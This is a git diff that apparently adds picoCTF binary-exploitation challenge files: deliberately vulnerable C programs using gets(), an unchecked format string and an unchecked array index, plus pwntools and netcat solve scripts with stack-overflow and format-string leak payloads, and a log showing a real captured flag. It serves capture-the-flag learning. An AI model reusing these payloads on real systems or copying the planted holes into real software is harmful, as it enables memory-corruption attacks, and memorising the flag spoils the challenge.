diff --git a/pwn/basic_file_exploit/netcat.log b/pwn/basic_file_exploit/netcat.log new file mode 100644 index 0000000..9fd7e40 --- /dev/null +++ b/pwn/basic_file_exploit/netcat.log @@ -0,0 +1,21 @@ +$ nc saturn.picoctf.net 51109 +Hi, welcome to my echo chamber! +Type '1' to enter a phrase into our database +Type '2' to echo a phrase in our database +Type '3' to exit the program +1 +1 +Please enter your data: +asdf +asdf +Please enter the length of your data: +4 +4 +Your entry number is: 1 +Write successful, would you like to do anything else? +2 +2 +Please enter the entry number of your data: +0 +0 +picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_E0394EC0} diff --git a/pwn/basic_file_exploit/program-redacted.c b/pwn/basic_file_exploit/program-redacted.c new file mode 100644 index 0000000..ad40974 --- /dev/null +++ b/pwn/basic_file_exploit/program-redacted.c @@ -0,0 +1,195 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define WAIT 60 + + +static const char* flag = "[REDACTED]"; + +static char data[10][100]; +static int input_lengths[10]; +static int inputs = 0; + + + +int tgetinput(char *input, unsigned int l) +{ + fd_set input_set; + struct timeval timeout; + int ready_for_reading = 0; + int read_bytes = 0; + + if( l <= 0 ) + { + printf("'l' for tgetinput must be greater than 0\n"); + return -2; + } + + + /* Empty the FD Set */ + FD_ZERO(&input_set ); + /* Listen to the input descriptor */ + FD_SET(STDIN_FILENO, &input_set); + + /* Waiting for some seconds */ + timeout.tv_sec = WAIT; // WAIT seconds + timeout.tv_usec = 0; // 0 milliseconds + + /* Listening for input stream for any activity */ + ready_for_reading = select(1, &input_set, NULL, NULL, &timeout); + /* Here, first parameter is number of FDs in the set, + * second is our FD set for reading, + * third is the FD set in which any write activity needs to updated, + * which is not required in this case. + * Fourth is timeout + */ + + if (ready_for_reading == -1) { + /* Some error has occured in input */ + printf("Unable to read your input\n"); + return -1; + } + + if (ready_for_reading) { + read_bytes = read(0, input, l-1); + if(input[read_bytes-1]=='\n'){ + --read_bytes; + input[read_bytes]='\0'; + } + if(read_bytes==0){ + printf("No data given.\n"); + return -4; + } else { + return 0; + } + } else { + printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n"); + return -3; + } + + return 0; +} + + +static void data_write() { + char input[100]; + char len[4]; + long length; + int r; + + printf("Please enter your data:\n"); + r = tgetinput(input, 100); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + while (true) { + printf("Please enter the length of your data:\n"); + r = tgetinput(len, 4); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((length = strtol(len, NULL, 10)) == 0) { + puts("Please put in a valid length"); + } else { + break; + } + } + + if (inputs > 10) { + inputs = 0; + } + + strcpy(data[inputs], input); + input_lengths[inputs] = length; + + printf("Your entry number is: %d\n", inputs + 1); + inputs++; +} + + +static void data_read() { + char entry[4]; + long entry_number; + char output[100]; + int r; + + memset(output, '\0', 100); + + printf("Please enter the entry number of your data:\n"); + r = tgetinput(entry, 4); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((entry_number = strtol(entry, NULL, 10)) == 0) { + puts(flag); + fseek(stdin, 0, SEEK_END); + exit(0); + } + + entry_number--; + strncpy(output, data[entry_number], input_lengths[entry_number]); + puts(output); +} + + +int main(int argc, char** argv) { + char input[3] = {'\0'}; + long command; + int r; + + puts("Hi, welcome to my echo chamber!"); + puts("Type '1' to enter a phrase into our database"); + puts("Type '2' to echo a phrase in our database"); + puts("Type '3' to exit the program"); + + while (true) { + r = tgetinput(input, 3); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((command = strtol(input, NULL, 10)) == 0) { + puts("Please put in a valid number"); + } else if (command == 1) { + data_write(); + puts("Write successful, would you like to do anything else?"); + } else if (command == 2) { + if (inputs == 0) { + puts("No data yet"); + continue; + } + data_read(); + puts("Read successful, would you like to do anything else?"); + } else if (command == 3) { + return 0; + } else { + puts("Please type either 1, 2 or 3"); + puts("Maybe breaking boundaries elsewhere will be helpful"); + } + } + + return 0; +} diff --git a/pwn/buffer_overflow_0/flag.txt b/pwn/buffer_overflow_0/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/buffer_overflow_0/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/buffer_overflow_0/solve.sh b/pwn/buffer_overflow_0/solve.sh new file mode 100755 index 0000000..defe7bf --- /dev/null +++ b/pwn/buffer_overflow_0/solve.sh @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | nc saturn.picoctf.net 65443 diff --git a/pwn/buffer_overflow_0/vuln b/pwn/buffer_overflow_0/vuln new file mode 100755 index 0000000..e4e63e1 Binary files /dev/null and b/pwn/buffer_overflow_0/vuln differ diff --git a/pwn/buffer_overflow_0/vuln.c b/pwn/buffer_overflow_0/vuln.c new file mode 100644 index 0000000..ddeb1b5 --- /dev/null +++ b/pwn/buffer_overflow_0/vuln.c @@ -0,0 +1,44 @@ +#include +#include +#include +#include + +#define FLAGSIZE_MAX 64 + +char flag[FLAGSIZE_MAX]; + +void sigsegv_handler(int sig) { + printf("%s\n", flag); + fflush(stdout); + exit(1); +} + +void vuln(char *input){ + char buf2[16]; + strcpy(buf2, input); +} + +int main(int argc, char **argv){ + + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(flag,FLAGSIZE_MAX,f); + signal(SIGSEGV, sigsegv_handler); // Set up signal handler + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + + printf("Input: "); + fflush(stdout); + char buf1[100]; + gets(buf1); + vuln(buf1); + printf("The program will exit now\n"); + return 0; +} diff --git a/pwn/clutter_overflow/chall b/pwn/clutter_overflow/chall new file mode 100755 index 0000000..c37dc1d Binary files /dev/null and b/pwn/clutter_overflow/chall differ diff --git a/pwn/clutter_overflow/chall.c b/pwn/clutter_overflow/chall.c new file mode 100644 index 0000000..a5c070f --- /dev/null +++ b/pwn/clutter_overflow/chall.c @@ -0,0 +1,54 @@ +#include +#include + +#define SIZE 0x100 +#define GOAL 0xdeadbeef + +const char* HEADER = +" ______________________________________________________________________\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n" +"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n" +"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n" +"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n" +"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n" +"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n" +".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n" +"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n" +"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n" +"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n" +"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n" +"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""; + +int main(void) +{ + long code = 0; + char clutter[SIZE]; + + setbuf(stdout, NULL); + setbuf(stdin, NULL); + setbuf(stderr, NULL); + + puts(HEADER); + puts("My room is so cluttered..."); + puts("What do you see?"); + + gets(clutter); + + + if (code == GOAL) { + printf("code == 0x%llx: how did that happen??\n", GOAL); + puts("take a flag for your troubles"); + system("cat flag.txt"); + } else { + printf("code == 0x%llx\n", code); + printf("code != 0x%llx :(\n", GOAL); + } + + return 0; +} diff --git a/pwn/clutter_overflow/flag.txt b/pwn/clutter_overflow/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/clutter_overflow/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/clutter_overflow/solve.py b/pwn/clutter_overflow/solve.py new file mode 100755 index 0000000..2a489b4 --- /dev/null +++ b/pwn/clutter_overflow/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("chall") + +context.binary = exe + + +def conn(): + if args.LOCAL: + r = process([exe.path]) + if args.DEBUG: + gdb.attach(r) + else: + r = remote("mars.picoctf.net", 31890) + + return r + + +def main(): + r = conn() + # gdb.attach(r, 'break *main+143') + print(r.recvuntil(b'What do you see?\n')) + r.sendline((b'A' * 264) + p64(0xdeadbeef)) + print(r.recvall().decode()) + + +if __name__ == "__main__": + main() diff --git a/pwn/cve_xxxx_xxxx/flag.txt b/pwn/cve_xxxx_xxxx/flag.txt new file mode 100644 index 0000000..c8eaedd --- /dev/null +++ b/pwn/cve_xxxx_xxxx/flag.txt @@ -0,0 +1 @@ +CVE-2021-34527 diff --git a/pwn/stonks/solve.py b/pwn/stonks/solve.py new file mode 100755 index 0000000..b3312e5 --- /dev/null +++ b/pwn/stonks/solve.py @@ -0,0 +1,43 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p python3 python3Packages.pwntools + +from pwn import * + +ADDR = "mercury.picoctf.net 59616" +HOST, PORT = ADDR.split(" ") + +def main(): + for x in range(1,2): + r = remote(HOST, PORT) + r.recvline() + r.recvline() + r.recvline() + r.recvline() + r.recvline() + r.sendline(b'1') + r.recvline() + r.recvline() + r.recvline() + + # r.sendline(f'%{x}$s'.encode()) + # print(f'%{x}$s'.encode()) + r.sendline(b"%x." * 99 + b"%x") + r.recvline() + result = r.recvline() + print(result) + unpacked = [] + for x in result.strip().split(b"."): + x = int(x, 16) + print(x) + unpacked.extend([ + (x & 0x000000FF), + (x & 0x0000FF00) >> 8, + (x & 0x00FF0000) >> 16, + (x & 0xFF000000) >> 24, + ]) + for x in unpacked: + if x >= ord('!') and x <= ord('~'): + print(chr(x), end='') + +if __name__ == "__main__": + main() diff --git a/pwn/stonks/vuln.c b/pwn/stonks/vuln.c new file mode 100644 index 0000000..5b385a2 --- /dev/null +++ b/pwn/stonks/vuln.c @@ -0,0 +1,148 @@ +#include +#include +#include +#include + +#define FLAG_BUFFER 128 +#define MAX_SYM_LEN 4 + +typedef struct Stonks { + int shares; + char symbol[MAX_SYM_LEN + 1]; + struct Stonks *next; +} Stonk; + +typedef struct Portfolios { + int money; + Stonk *head; +} Portfolio; + +int view_portfolio(Portfolio *p) { + if (!p) { + return 1; + } + printf("\nPortfolio as of "); + fflush(stdout); + system("date"); // TODO: implement this in C + fflush(stdout); + + printf("\n\n"); + Stonk *head = p->head; + if (!head) { + printf("You don't own any stonks!\n"); + } + while (head) { + printf("%d shares of %s\n", head->shares, head->symbol); + head = head->next; + } + return 0; +} + +Stonk *pick_symbol_with_AI(int shares) { + if (shares < 1) { + return NULL; + } + Stonk *stonk = malloc(sizeof(Stonk)); + stonk->shares = shares; + + int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1; + for (int i = 0; i <= MAX_SYM_LEN; i++) { + if (i < AI_symbol_len) { + stonk->symbol[i] = 'A' + (rand() % 26); + } else { + stonk->symbol[i] = '\0'; + } + } + + stonk->next = NULL; + + return stonk; +} + +int buy_stonks(Portfolio *p) { + if (!p) { + return 1; + } + char api_buf[FLAG_BUFFER]; + FILE *f = fopen("api","r"); + if (!f) { + printf("Flag file not found. Contact an admin.\n"); + exit(1); + } + fgets(api_buf, FLAG_BUFFER, f); + + int money = p->money; + int shares = 0; + Stonk *temp = NULL; + printf("Using patented AI algorithms to buy stonks\n"); + while (money > 0) { + shares = (rand() % money) + 1; + temp = pick_symbol_with_AI(shares); + temp->next = p->head; + p->head = temp; + money -= shares; + } + printf("Stonks chosen\n"); + + // TODO: Figure out how to read token from file, for now just ask + + char *user_buf = malloc(300 + 1); + printf("What is your API token?\n"); + scanf("%300s", user_buf); + printf("Buying stonks with token:\n"); + printf(user_buf); + + // TODO: Actually use key to interact with API + + view_portfolio(p); + + return 0; +} + +Portfolio *initialize_portfolio() { + Portfolio *p = malloc(sizeof(Portfolio)); + p->money = (rand() % 2018) + 1; + p->head = NULL; + return p; +} + +void free_portfolio(Portfolio *p) { + Stonk *current = p->head; + Stonk *next = NULL; + while (current) { + next = current->next; + free(current); + current = next; + } + free(p); +} + +int main(int argc, char *argv[]) +{ + setbuf(stdout, NULL); + srand(time(NULL)); + Portfolio *p = initialize_portfolio(); + if (!p) { + printf("Memory failure\n"); + exit(1); + } + + int resp = 0; + + printf("Welcome back to the trading app!\n\n"); + printf("What would you like to do?\n"); + printf("1) Buy some stonks!\n"); + printf("2) View my portfolio\n"); + scanf("%d", &resp); + + if (resp == 1) { + buy_stonks(p); + } else if (resp == 2) { + view_portfolio(p); + } + + free_portfolio(p); + printf("Goodbye!\n"); + + exit(0); +}